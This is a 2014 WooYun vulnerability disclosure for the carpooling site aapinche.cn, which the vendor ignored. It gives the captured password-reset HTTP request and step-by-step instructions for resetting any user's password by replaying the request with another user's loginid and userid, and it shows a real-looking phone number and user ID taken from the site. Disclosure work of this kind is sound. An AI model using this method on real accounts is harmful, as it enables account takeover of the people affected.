当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080278

漏洞标题:AA拼车网之任意密码找回2

相关厂商:aayun.com

漏洞作者: BMa

提交时间:2014-10-22 10:00

修复时间:2014-10-27 10:02

公开时间:2014-10-27 10:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

AA拼车网之任意密码找回2

详细说明:

前面提交过通过爆破验证码找回密码,这里是另外一个地方,也是密码找回
首先看看正常流程密码找回时的数据包:

POST /account/safe/password/find/reset.aspx?do=submit HTTP/1.1
Host: www.aapinche.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.aapinche.cn/ff/safe/password/find/reset.aspx?key=1751692&value=D5E8EA76F5CF4B5FE49DC6A3FFCD689EF25EA78E88874F4F19E7C7&other=CAXEBXABCXDXZOALOVF
Content-Length: 38
Cookie: bdshare_firstime=1413864086456; ASP.NET_SessionId=o4doyk5aylalrncvlx1pb1ww; aapinche_validatecode=code=2652C66B690BFCB25EEDFE46636BFC3; aapinche_find=loginid=xxx@qq.com&userid=17517xx;
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Password=blackmanba&ConfirmPass=blackmanba


存在的问题是服务器在验证时只验证了loginid和userid是否匹配,匹配就可以重置密码,所以我们可以抓正常重置密码的数据包,然后提交其他用户的loginid和userid,loginid可以为邮箱和手机号。
并且这个数据包的存活时间非常长,几个小时都ok。
那么怎么得到loginid和userid呢?往下看

漏洞证明:

重置任意用户密码步骤:
1,注册一个用户,找回密码抓取数据包

0.png


2,可以在拼车页面查看联系方式,找到手机号
例如:http://www.aapinche.cn/yichang/11119889.html 查看联系方式:得到login-id手机号码:13872652111

1.jpg


3,接下来点击图像,跳转到链接http://www.aapinche.cn/user/1461883.html得到:user-ID:1461883

2.jpg


22.png


4,在抓取的数据包中,填入对应的loginid和userid,repeat数据包,重置密码成功

3.jpg


修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-27 10:02

厂商回复:

最新状态:

暂无